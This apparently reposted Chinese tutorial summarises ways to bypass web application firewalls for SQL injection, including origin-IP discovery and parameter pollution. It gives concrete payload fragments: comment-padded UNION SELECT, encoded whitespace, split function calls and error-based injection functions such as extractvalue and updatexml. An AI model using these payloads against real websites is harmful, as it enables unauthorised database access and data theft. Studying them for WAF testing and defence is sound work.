概述
1.架构层面绕过waf
(1)寻找源网站绕过waf检测
主要针对的是云waf,找到源网站的真实地址(可以用超级ping),进行绕过,有点像CDN
(2)通过同网段绕过waf防护
在一个网段中,可能经过的数据不会经过云waf,从而实现绕过。
2.资源限制角度绕过waf
一般waf的执行需要优先考虑业务优先的原则,所以对于构造较大、超大数据包可能不会进行检测,从而实现绕过waf。
3.协议层面绕过waf
(1)协议未覆盖绕过waf
比如由于业务需要,只对get型进行检测,post数据选择忽略
(2)参数污染
index?id=1&id=2 waf可能只对id=1进行检测
4.规则层面的绕过
(1)sql注释符绕过
union /**/select #我们将union select之间的空格使用注释符进行替换(适用于对union select之间的空格进行检测的情况)
union/*crow%0%32#*/select #我们在注释符中间填充内容
union/*aaaaaaaaaabbbbbbbbbcccccccccccdddddddddddeeeeeeeeeeee%%%%%%%%%*/select #构造较大数据
/*!union select*/= #内联注释,mysql特有
(2)空白符绕过
mysql空白符:%09;%0A; %0B; %0D; %20; %0C; %A0; /*XXX*/
正则空白符: %09;%0A; %0B; %0D; %20;
%25其实就是百分号 %25A0 就是空白符
(3)函数分割符号
将一个函数进行分割,例:concat()
%25其实就是百分号 %25A0 就是空白符
concat%2520(
concat/**/(
concat%250c(
concat%25a0(
- 浮点数词法解释
waf对于id=1可以进行检测,但是对于id=1E0、id=1.0、id=N可能就无法检测
5. 利用error-based(报错注入)进行sql注入
一些常用的报错注入函数
extractvalue(1, concat(0x5c,md5(3)));
updatexml(1, concat(0x5d,md5(3)),1);
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
- mysql 特殊语法
select {x schema_name} from {x information_schema.schemata};
select {x 1};
最后
以上就是娇气水池为你收集整理的sql注入waf绕过的全部内容,希望文章能够帮你解决sql注入waf绕过所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复